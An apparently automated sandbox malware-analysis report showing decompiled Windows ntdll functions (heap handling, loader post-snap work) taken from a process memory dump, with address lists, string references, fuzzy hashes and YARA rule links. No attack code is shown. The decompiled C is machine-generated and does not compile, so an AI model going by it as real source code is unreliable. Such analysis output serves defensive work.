							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0113A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E01097D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E01131582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E01097D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E01131582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E0109B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E0109BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0113A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                            0x0109b486
                                                                            0x0109b48a
                                                                            0x0109b48e
                                                                            0x0109b491
                                                                            0x0109b493
                                                                            0x0109b49a
                                                                            0x0109b49c
                                                                            0x0109b4a2
                                                                            0x0109b4a7
                                                                            0x0109b6fc
                                                                            0x0109b6fc
                                                                            0x0109b6b3
                                                                            0x0109b6c3
                                                                            0x0109b6c3
                                                                            0x0109b4b4
                                                                            0x010e294f
                                                                            0x010e2951
                                                                            0x010e2957
                                                                            0x010e295d
                                                                            0x010e2961
                                                                            0x010e2980
                                                                            0x010e2985
                                                                            0x010e2963
                                                                            0x010e2978
                                                                            0x010e297d
                                                                            0x010e298b
                                                                            0x010e2990
                                                                            0x010e2995
                                                                            0x010e299d
                                                                            0x010e29a1
                                                                            0x010e29a2
                                                                            0x010e29a2
                                                                            0x010e29a7
                                                                            0x010e29a7
                                                                            0x010e2951
                                                                            0x0109b4ba
                                                                            0x0109b4ba
                                                                            0x0109b4bd
                                                                            0x0109b4c2
                                                                            0x0109b6d4
                                                                            0x0109b4c8
                                                                            0x0109b4c8
                                                                            0x0109b4c8
                                                                            0x0109b4cd
                                                                            0x0109b4d0
                                                                            0x0109b4d9
                                                                            0x0109b4df
                                                                            0x0109b4e2
                                                                            0x010e29b7
                                                                            0x010e29bd
                                                                            0x00000000
                                                                            0x0109b4e8
                                                                            0x0109b4e8
                                                                            0x0109b4ef
                                                                            0x0109b4fa
                                                                            0x0109b703
                                                                            0x0109b709
                                                                            0x0109b70b
                                                                            0x0109b711
                                                                            0x0109b711
                                                                            0x0109b70b
                                                                            0x0109b503
                                                                            0x0109b50c
                                                                            0x0109b511
                                                                            0x0109b514
                                                                            0x0109b519
                                                                            0x010e29c5
                                                                            0x010e29c7
                                                                            0x010e29cc
                                                                            0x010e29cd
                                                                            0x010e29cf
                                                                            0x010e29d0
                                                                            0x010e29d2
                                                                            0x010e29d7
                                                                            0x010e29d9
                                                                            0x010e29ee
                                                                            0x010e29ee
                                                                            0x010e29f4
                                                                            0x010e29fa
                                                                            0x010e2a01
                                                                            0x00000000
                                                                            0x010e2a01
                                                                            0x010e29db
                                                                            0x010e29df
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e29e1
                                                                            0x010e29e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e29e6
                                                                            0x010e29e6
                                                                            0x0109b51f
                                                                            0x0109b51f
                                                                            0x0109b520
                                                                            0x0109b525
                                                                            0x0109b52b
                                                                            0x0109b52d
                                                                            0x0109b52e
                                                                            0x0109b530
                                                                            0x0109b535
                                                                            0x0109b53b
                                                                            0x0109b53d
                                                                            0x010e2a07
                                                                            0x00000000
                                                                            0x010e2a07
                                                                            0x0109b549
                                                                            0x0109b54e
                                                                            0x010e2a12
                                                                            0x010e2a15
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2a24
                                                                            0x0109b559
                                                                            0x0109b55c
                                                                            0x010e2a34
                                                                            0x010e2a3b
                                                                            0x010e2a4d
                                                                            0x010e2a4d
                                                                            0x010e2a3b
                                                                            0x0109b566
                                                                            0x0109b56b
                                                                            0x0109b56f
                                                                            0x0109b57b
                                                                            0x0109b582
                                                                            0x010e2a57
                                                                            0x010e2a5c
                                                                            0x010e2a5c
                                                                            0x0109b582
                                                                            0x0109b58b
                                                                            0x0109b58e
                                                                            0x0109b592
                                                                            0x0109b596
                                                                            0x0109b599
                                                                            0x0109b59b
                                                                            0x0109b59e
                                                                            0x0109b5a3
                                                                            0x0109b5a6
                                                                            0x0109b5a9
                                                                            0x010e2a66
                                                                            0x010e2a67
                                                                            0x010e2a73
                                                                            0x010e2a78
                                                                            0x0109b5b8
                                                                            0x0109b5b8
                                                                            0x0109b5bb
                                                                            0x0109b5bd
                                                                            0x0109b5bd
                                                                            0x0109b5c4
                                                                            0x0109b5f7
                                                                            0x0109b5f7
                                                                            0x0109b600
                                                                            0x0109b606
                                                                            0x0109b60c
                                                                            0x0109b612
                                                                            0x0109b618
                                                                            0x0109b621
                                                                            0x0109b623
                                                                            0x0109b629
                                                                            0x0109b629
                                                                            0x0109b62c
                                                                            0x0109b62f
                                                                            0x0109b633
                                                                            0x0109b636
                                                                            0x0109b639
                                                                            0x0109b71d
                                                                            0x0109b720
                                                                            0x0109b736
                                                                            0x0109b660
                                                                            0x0109b660
                                                                            0x0109b662
                                                                            0x0109b665
                                                                            0x0109b66a
                                                                            0x0109b6e6
                                                                            0x0109b6e7
                                                                            0x0109b6ea
                                                                            0x0109b6ef
                                                                            0x010e2ad1
                                                                            0x010e2ad2
                                                                            0x010e2ad8
                                                                            0x010e2add
                                                                            0x010e2add
                                                                            0x0109b6f5
                                                                            0x0109b6f5
                                                                            0x0109b672
                                                                            0x0109b675
                                                                            0x0109b67a
                                                                            0x010e2ae5
                                                                            0x010e2ae8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2af4
                                                                            0x010e2afc
                                                                            0x00000000
                                                                            0x0109b680
                                                                            0x0109b680
                                                                            0x0109b680
                                                                            0x0109b685
                                                                            0x0109b687
                                                                            0x0109b68a
                                                                            0x010e2b06
                                                                            0x010e2b0c
                                                                            0x010e2b13
                                                                            0x010e2b1e
                                                                            0x010e2b20
                                                                            0x010e2b2b
                                                                            0x010e2b2b
                                                                            0x010e2b2b
                                                                            0x010e2b34
                                                                            0x010e2b45
                                                                            0x010e2b45
                                                                            0x010e2b13
                                                                            0x0109b696
                                                                            0x0109b69b
                                                                            0x0109b6a0
                                                                            0x010e2b4f
                                                                            0x010e2b52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2b61
                                                                            0x00000000
                                                                            0x0109b6a6
                                                                            0x0109b6a6
                                                                            0x0109b6a6
                                                                            0x0109b6a8
                                                                            0x0109b6ab
                                                                            0x010e2b70
                                                                            0x010e2b72
                                                                            0x010e2b7d
                                                                            0x010e2b7d
                                                                            0x010e2b7d
                                                                            0x010e2b86
                                                                            0x010e2b97
                                                                            0x010e2b97
                                                                            0x0109b6b1
                                                                            0x00000000
                                                                            0x0109b6b1
                                                                            0x0109b6a0
                                                                            0x0109b67a
                                                                            0x0109b722
                                                                            0x0109b722
                                                                            0x0109b655
                                                                            0x0109b65d
                                                                            0x00000000
                                                                            0x0109b5c6
                                                                            0x0109b5c6
                                                                            0x0109b5ce
                                                                            0x010e2a83
                                                                            0x010e2a97
                                                                            0x010e2a97
                                                                            0x010e2a9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2a88
                                                                            0x010e2a8a
                                                                            0x010e2a8c
                                                                            0x010e2a8f
                                                                            0x010e2a92
                                                                            0x010e2aa1
                                                                            0x010e2aa1
                                                                            0x010e2aa2
                                                                            0x010e2aab
                                                                            0x010e2ab0
                                                                            0x00000000
                                                                            0x010e2ab0
                                                                            0x010e2a94
                                                                            0x010e2a94
                                                                            0x00000000
                                                                            0x010e2a9c
                                                                            0x0109b5d4
                                                                            0x0109b5d4
                                                                            0x0109b5d6
                                                                            0x0109b5d9
                                                                            0x0109b5de
                                                                            0x0109b5e1
                                                                            0x0109b5e4
                                                                            0x010e2ab8
                                                                            0x010e2ab9
                                                                            0x010e2ac4
                                                                            0x010e2ac9
                                                                            0x0109b5f2
                                                                            0x0109b5f2
                                                                            0x0109b5f4
                                                                            0x0109b5f4
                                                                            0x00000000
                                                                            0x0109b5e4
                                                                            0x0109b5c4
                                                                            0x0109b554
                                                                            0x0109b554
                                                                            0x00000000
                                                                            0x0109b554

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                            • API String ID: 0-4253913091
                                                                            • Opcode ID: 7073ce61a5ff90b72cc91d0ad0cd0018d5522f5ef5b65ca96d914feeeb380590
                                                                            • Instruction ID: d7e777325ba3bd7c6774ef423fe1a3a69945370b7053b403bb7679b7d39b6eca
                                                                            • Opcode Fuzzy Hash: 7073ce61a5ff90b72cc91d0ad0cd0018d5522f5ef5b65ca96d914feeeb380590
                                                                            • Instruction Fuzzy Hash: D7E19A70600205AFDB19CF69D8A4FBEBBF5FF48314F1481A9E5929B291D734E981CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01088794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 83%
                                                                            			E01088794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0108934A() != 0) {
								_t159 = E010FA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1165780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E010F5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1165780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0108849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01088999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01088999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1165c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1165c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01092280(_t92, 0x11686cc);
															_t94 = E01149DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E010A61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1165c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01088A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1165c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1165c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E010BF380(_t136, 0x1051184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01092280(_t108, 0x11686cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E010A61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01149D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0108FFB0(_t118, _t156, 0x11686cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E010B9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                            0x01088799
                                                                            0x0108879d
                                                                            0x010887a1
                                                                            0x010887a3
                                                                            0x010887a8
                                                                            0x010887c3
                                                                            0x010887c3
                                                                            0x010887c8
                                                                            0x010887d1
                                                                            0x010887d4
                                                                            0x010887d8
                                                                            0x010887e5
                                                                            0x010887ec
                                                                            0x010d9bfe
                                                                            0x010d9c00
                                                                            0x010d9c02
                                                                            0x010d9c08
                                                                            0x010d9c0d
                                                                            0x010d9c0f
                                                                            0x010d9c14
                                                                            0x010d9c2d
                                                                            0x010d9c32
                                                                            0x010d9c37
                                                                            0x010d9c3a
                                                                            0x010d9c3c
                                                                            0x010d9c42
                                                                            0x010d9c42
                                                                            0x010d9c3c
                                                                            0x010d9c02
                                                                            0x010887da
                                                                            0x010887df
                                                                            0x010887e3
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010887e3
                                                                            0x010887f2
                                                                            0x00000000
                                                                            0x010887fb
                                                                            0x010887fd
                                                                            0x010887fe
                                                                            0x0108880e
                                                                            0x0108880f
                                                                            0x01088810
                                                                            0x01088814
                                                                            0x0108881a
                                                                            0x0108881c
                                                                            0x0108881f
                                                                            0x01088821
                                                                            0x01088822
                                                                            0x01088824
                                                                            0x01088826
                                                                            0x0108882c
                                                                            0x0108882e
                                                                            0x010d9c48
                                                                            0x010d9c48
                                                                            0x01088834
                                                                            0x01088834
                                                                            0x01088837
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01088837
                                                                            0x0108882e
                                                                            0x0108883d
                                                                            0x01088840
                                                                            0x01088843
                                                                            0x01088846
                                                                            0x01088849
                                                                            0x0108884c
                                                                            0x0108884e
                                                                            0x01088850
                                                                            0x01088852
                                                                            0x01088854
                                                                            0x01088857
                                                                            0x010888b4
                                                                            0x010888b6
                                                                            0x010888b6
                                                                            0x01088859
                                                                            0x01088859
                                                                            0x01088859
                                                                            0x01088861
                                                                            0x01088866
                                                                            0x0108886a
                                                                            0x0108893d
                                                                            0x01088941
                                                                            0x00000000
                                                                            0x01088947
                                                                            0x01088947
                                                                            0x0108894a
                                                                            0x0108894c
                                                                            0x00000000
                                                                            0x01088952
                                                                            0x01088955
                                                                            0x0108895a
                                                                            0x0108895d
                                                                            0x0108895d
                                                                            0x0108895f
                                                                            0x01088961
                                                                            0x01088961
                                                                            0x01088968
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0108896a
                                                                            0x0108896b
                                                                            0x0108896e
                                                                            0x00000000
                                                                            0x01088970
                                                                            0x01088970
                                                                            0x01088970
                                                                            0x01088970
                                                                            0x01088972
                                                                            0x01088972
                                                                            0x01088974
                                                                            0x00000000
                                                                            0x0108897a
                                                                            0x0108897a
                                                                            0x0108897d
                                                                            0x00000000
                                                                            0x01088983
                                                                            0x010d9c65
                                                                            0x010d9c6d
                                                                            0x010d9c72
                                                                            0x010d9c75
                                                                            0x010d9c75
                                                                            0x010d9c82
                                                                            0x010d9c86
                                                                            0x010d9c87
                                                                            0x010d9c88
                                                                            0x010d9c89
                                                                            0x010d9c8c
                                                                            0x010d9c90
                                                                            0x010d9c95
                                                                            0x010d9c97
                                                                            0x010d9ca0
                                                                            0x010d9ca3
                                                                            0x010d9ca9
                                                                            0x010d9ca9
                                                                            0x00000000
                                                                            0x010d9ca9
                                                                            0x010d9ca3
                                                                            0x00000000
                                                                            0x010d9c97
                                                                            0x0108897d
                                                                            0x00000000
                                                                            0x01088974
                                                                            0x01088988
                                                                            0x01088992
                                                                            0x01088996
                                                                            0x00000000
                                                                            0x01088996
                                                                            0x0108894c
                                                                            0x00000000
                                                                            0x01088870
                                                                            0x0108887b
                                                                            0x0108887d
                                                                            0x0108887f
                                                                            0x01088881
                                                                            0x01088884
                                                                            0x01088884
                                                                            0x01088886
                                                                            0x01088889
                                                                            0x0108888c
                                                                            0x0108888e
                                                                            0x01088891
                                                                            0x01088891
                                                                            0x01088898
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0108889a
                                                                            0x0108889b
                                                                            0x0108889e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010888a0
                                                                            0x010888a8
                                                                            0x010888b0
                                                                            0x010888b2
                                                                            0x010888d3
                                                                            0x010888d5
                                                                            0x00000000
                                                                            0x010888d7
                                                                            0x010888db
                                                                            0x010888dc
                                                                            0x010888e0
                                                                            0x010888e8
                                                                            0x010888ee
                                                                            0x010888f0
                                                                            0x010888f3
                                                                            0x010888fc
                                                                            0x01088901
                                                                            0x01088906
                                                                            0x0108890c
                                                                            0x0108890c
                                                                            0x0108890f
                                                                            0x01088916
                                                                            0x01088917
                                                                            0x01088918
                                                                            0x01088919
                                                                            0x0108891a
                                                                            0x0108891f
                                                                            0x01088921
                                                                            0x010d9c52
                                                                            0x010d9c55
                                                                            0x010d9c5b
                                                                            0x010d9cac
                                                                            0x010d9cc0
                                                                            0x010d9cc0
                                                                            0x010d9c55
                                                                            0x01088927
                                                                            0x01088927
                                                                            0x0108892f
                                                                            0x01088933
                                                                            0x00000000
                                                                            0x010888f5
                                                                            0x010888f5
                                                                            0x00000000
                                                                            0x010888f7
                                                                            0x010888f7
                                                                            0x010888fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010888fa
                                                                            0x010888f5
                                                                            0x010888f3
                                                                            0x00000000
                                                                            0x010888d5
                                                                            0x00000000
                                                                            0x010888b2
                                                                            0x010888c9
                                                                            0x00000000
                                                                            0x010888c9
                                                                            0x0108887f
                                                                            0x0108886a
                                                                            0x01088857
                                                                            0x01088852
                                                                            0x010888bf
                                                                            0x010888bf
                                                                            0x010887aa
                                                                            0x010887ad
                                                                            0x010887ae
                                                                            0x010887b4
                                                                            0x010887b5
                                                                            0x010887b6
                                                                            0x010887b8
                                                                            0x010887bd
                                                                            0x010887c1
                                                                            0x010887f4
                                                                            0x010887fa
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010887c1
                                                                            0x00000000

                                                                            Strings
                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 010D9C18
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 010D9C28
                                                                            • LdrpDoPostSnapWork, xrefs: 010D9C1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 2994545307-1948996284
                                                                            • Opcode ID: bd69953d42077b8762e06f6e37c7d95aa3c3d2353acba0904c31911da0aa4a1f
                                                                            • Instruction ID: 7dce9404c318a497f2f174d83709cd0bafdcb3725b2f0df987364914db029d09
                                                                            • Opcode Fuzzy Hash: bd69953d42077b8762e06f6e37c7d95aa3c3d2353acba0904c31911da0aa4a1f
                                                                            • Instruction Fuzzy Hash: F1912931A0421ADFDF58EF59D480ABA77F5FF44314B8481AADAC1AB251DB31ED01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010AAC7B, Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 80%
                                                                            			E010AAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E010CD5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x1168a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E010B96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01123C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
